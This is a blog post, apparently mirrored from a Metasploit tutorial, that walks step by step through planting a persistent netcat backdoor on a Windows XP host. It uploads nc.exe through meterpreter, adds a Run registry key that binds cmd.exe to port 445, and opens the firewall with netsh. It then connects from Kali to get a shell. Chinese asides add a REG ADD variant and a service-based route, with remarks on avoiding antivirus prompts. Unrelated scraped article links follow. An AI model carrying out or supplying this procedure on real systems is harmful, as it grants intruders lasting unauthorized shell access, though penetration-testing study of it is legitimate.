In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

[*] uploading  : /tmp/nc.exe -> C:\windows\system32

[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

  Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values ():

    VMware Tools

    VMware User Process

    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

Successful set nc.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: nc

Type: REG_SZ

Data: C:\windows\system32\nc.exe -Ldp  -e cmd.exe

  使用命令行自带的reg命令也行, 前提是系统杀毒软件不出提示:

REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"

  Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i

Process  created.

Channel  created.

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode

Netsh firewall show opmode

Domain profile configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Standard profile configuration (current):

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Local Area Connection firewall configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

  We open up port 445 in the firewall and double-check that it was set properly.

C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening

netsh firewall show portopening

Port configuration for Domain profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   Service Firewall

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

C:\Documents and Settings\Jim\My Documents >

  So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128

172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [172.16.104.128]  (?) open

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim > dir

dir

Volume in drive C has no label.

Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim

// : AM

.

// : AM

..

// : AM  ;i

// : PM

Desktop

// : PM

Favorites

// : PM

My Documents

// : AM  QCY

// : AM

Start Menu

// : AM  talltelnet.log

// : AM  talltftp.log

 File(s)  bytes

 Dir(s) ,,, bytes free

C:\Documents and Settings\Jim >

  Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.

  .使用sc创建自定义服务,留下后门, 但是有个问题是360还是会提示, 防止注册表被写入

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://sqqihao.github.io/
QQ:287101329

微信:18101055830

Persistent Netcat Backdoor的更多相关文章

  1. Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

    Microsoft Windows .Reg文件对话框消息欺骗 0day 概述 扩展名为.reg的文件是Windows注册表中使用的注册文件.这些文件可以包含hives.密钥和值..reg文件可以在文 ...

  2. Persistent Data Structures

    原文链接:http://www.codeproject.com/Articles/9680/Persistent-Data-Structures Introduction When you hear ...

  3. CodeForces #368 div2 D Persistent Bookcase DFS

    题目链接:D Persistent Bookcase 题意:有一个n*m的书架,开始是空的,现在有k种操作: 1 x y 这个位置如果没书,放书. 2 x y 这个位置如果有书,拿走. 3 x 反转这 ...

  4. coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores.

    最近在修改一个程序BUG的时候遇到一个问题coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores. 但实际跑程序 ...

  5. Exception loading sessions from persistent storage

    严重: Exception loading sessions from persistent storage java.io.EOFException 删除Tomcat里面的work/Catalina ...

  6. 【Codeforces-707D】Persistent Bookcase DFS + 线段树

    D. Persistent Bookcase Recently in school Alina has learned what are the persistent data structures: ...

  7. netcat命令

    1 简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netc ...

  8. nc 局域网聊天+文件传输(netcat)

    nc 局域网聊天+文件传输 nc的全程是netcat,这个工具非常好用. 有时候我们需要在局域网内传送一些文本消息或者文件的时候,通常的做法是安装一些局域网通讯软件,然后来做.其实不必要这样,使用nc ...

  9. POJ - 3652 Persistent Bits

    “模拟”类型,题型容易,使用bitset库对二进制逐位操作,初始化.十进制转二进制(unsigned int).位操作. POJ - 3652 Persistent Bits Time Limit:  ...

随机推荐

  1. 为什么我不再用 .NET 框架

    .NET平台很棒.真的很棒.直到它不再那么棒.我为什么不再用.NET?简单来说,它限制了我们选择的能力(对我来说很重要),转移了我们的注意力,使得我们向内认知它的安全性,替代了帮助我们认知外面广阔世界 ...

  2. lodash用法系列(6),函数种种

    Lodash用来操作对象和集合,比Underscore拥有更多的功能和更好的性能. 官网:https://lodash.com/引用:<script src="//cdnjs.clou ...

  3. concat函數 函數concat 可以用來合拼兩個或以上的字串。

    12. “Mexico 墨西哥”的首都是”Mexico City”. 顯示所有國家名字,其首都是國家名字加上”City”. concat函數 函數concat 可以用來合拼兩個或以上的字串. : SE ...

  4. rtorrent - 强大的命令行BT客户端

    NOTE - 文中展示的所有示例和指令都已经在Ubuntu 13.04中测试过. 一.            安装 [root@GY-10000 data]# yum search rtorrent ...

  5. YUI-compressor 在Linux下安装和使用

    介绍一个非常流行的javascript压缩工具YUI compressor,可以提供更好的压缩效率:该工具由著名的Yahoo Exceptional Performance项目组出品. JSMin非常 ...

  6. Xcode6 itunes完美打包api 方法

    转:http://bbs.csdn.net/topics/390948190 Xcode6 itunes完美打包api 方法! 特点轻盈小巧,方便快捷!

  7. SQLite中的增删改查

    虽然android提供了sql查询的封装方法,但是理解起来还是麻烦,所以我这里用sql语句来完成工作. 首先是建立一个类,继承SQLiteOpenHelper 这里面会建立一个数据库,并且初始化一个表 ...

  8. idea自动生成serialVersionUID , serialVersionUID的作用

    Java的序列化的机制通过判断serialVersionUID来验证版本的一致性.在反序列化的时候与本地的类的serialVersionUID进行比较,一致则可以进行反序列化,不一致则会抛出异常Inv ...

  9. go语言之进阶篇通过map生成json

    1.通过map生成json 示例1: package main import ( "encoding/json" "fmt" ) func main() { / ...

  10. 在Linux中查看正在运行哪些process,杀掉一批名字相同的process

    列出全部进程: ps -A 杀掉所有名为netmist的进程 killall netmist 参考资料 ============ https://www.howtogeek.com/107217/ho ...